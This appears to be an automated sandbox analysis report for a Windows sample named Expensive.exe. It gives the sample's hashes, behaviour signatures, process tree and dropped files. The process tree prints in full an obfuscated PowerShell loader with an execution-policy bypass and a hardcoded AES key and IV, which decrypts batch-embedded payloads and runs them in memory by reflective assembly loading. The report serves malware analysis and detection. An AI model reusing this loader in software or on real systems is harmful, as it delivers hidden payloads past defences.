Analysis

  • max time kernel
    10s
  • max time network
    0s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    26-05-2024 16:13

General

  • Target

    Expensive.exe

  • Size

    599KB

  • MD5

    65e4c0420f496abb02201df254eb87a1

  • SHA1

    6efcf4be11132a32a3df5029c87d2daa466fcc1a

  • SHA256

    3684b6d86d9928b8dfef807c55d5de421b6325c0cb28991037d26703598d1e44

  • SHA512

    bedb40ae7f3a6c1a2cc7e62069025d87b5383526e414df9825ad50bf8516077574134fe25ff285f0754d2bee608ba619ee56a33d4e9ddb6a997dab4d5635f6bb

  • SSDEEP

    12288:jeHrZIhqCgsKF/kFnBf5rkb2LAW/4Mon2rcATuNpGRhb5vUMfyU1/:jsFQqS0kR9aCkW/4t2r9upGmM6U1

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 9 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Expensive.exe
    "C:\Users\Admin\AppData\Local\Temp\Expensive.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2936
    • C:\Users\Admin\AppData\Local\Temp\ExpensiveLauncher.exe
      "C:\Users\Admin\AppData\Local\Temp\ExpensiveLauncher.exe"
      2⤵
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2072
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c cls
        3⤵
          PID:2740
      • C:\Windows\system32\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\Expensive.bat" "
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3024
        • C:\Windows\system32\net.exe
          net file
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2720
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 file
            4⤵
              PID:2772
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zlo9ncEYo3QUkLbnvPRah2udZSQFyEkFClqBW6M5QLg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KvNrQpenzWsPMRFAkt8PNg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dWnBZ=New-Object System.IO.MemoryStream(,$param_var); $fgVcf=New-Object System.IO.MemoryStream; $AcYrR=New-Object System.IO.Compression.GZipStream($dWnBZ, [IO.Compression.CompressionMode]::Decompress); $AcYrR.CopyTo($fgVcf); $AcYrR.Dispose(); $dWnBZ.Dispose(); $fgVcf.Dispose(); $fgVcf.ToArray();}function execute_function($param_var,$param2_var){ $MnaPb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KIsjD=$MnaPb.EntryPoint; $KIsjD.Invoke($null, $param2_var);}$UgcxC = 'C:\Users\Admin\AppData\Local\Temp\Expensive.bat';$host.UI.RawUI.WindowTitle = $UgcxC;$RYiHp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($UgcxC).Split([Environment]::NewLine);foreach ($AWVRD in $RYiHp) { if ($AWVRD.StartsWith(':: ')) { $qeYnm=$AWVRD.Substring(3); break; }}$payloads_var=[string[]]$qeYnm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2660

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\Expensive.bat

        Filesize

        733KB

        MD5

        ab7ca8b87249457d23cd632d21183dfc

        SHA1

        d234f7e75f972baa135ab8505e44fcd478c04447

        SHA256

        e1437b2de1ccd08aab8f31532cf8109afdb84782c8927f3feeea25ba6be10c6e

        SHA512

        cd70a7400bc54bbcdb9c6c113e4785a7d3025a740415de997168d184950e874bc4b0c73448facdc89c8afbbdeef6b26deff703f19494bb56bf504d922f17dfa2

      • \Users\Admin\AppData\Local\Temp\ExpensiveLauncher.exe

        Filesize

        101KB

        MD5

        0593b521f3e8af295d523ea480388b0f

        SHA1

        39fc9ab8b8663801319557b06defb2a50e0c5d08

        SHA256

        3247a643a33c091fe826b3ce8e5e9524c5863e3c71eb9168f1bf52520742a8b9

        SHA512

        adc9c7875965c06fda648dce41975e1a7b7ef44b233a20efdebeae61e8b99c8e2cf809112cf3e4c1aaf00a2d1dd5c39a0be68541782aea9cbe87f12044c81b6d

      • memory/2660-22-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

        Filesize

        2.9MB

      • memory/2660-23-0x0000000001C80000-0x0000000001C88000-memory.dmp

        Filesize

        32KB

      • memory/2936-0-0x000007FEF5743000-0x000007FEF5744000-memory.dmp

        Filesize

        4KB

      • memory/2936-1-0x0000000001150000-0x00000000011EC000-memory.dmp

        Filesize

        624KB

      • memory/2936-17-0x000007FEF5740000-0x000007FEF612C000-memory.dmp

        Filesize

        9.9MB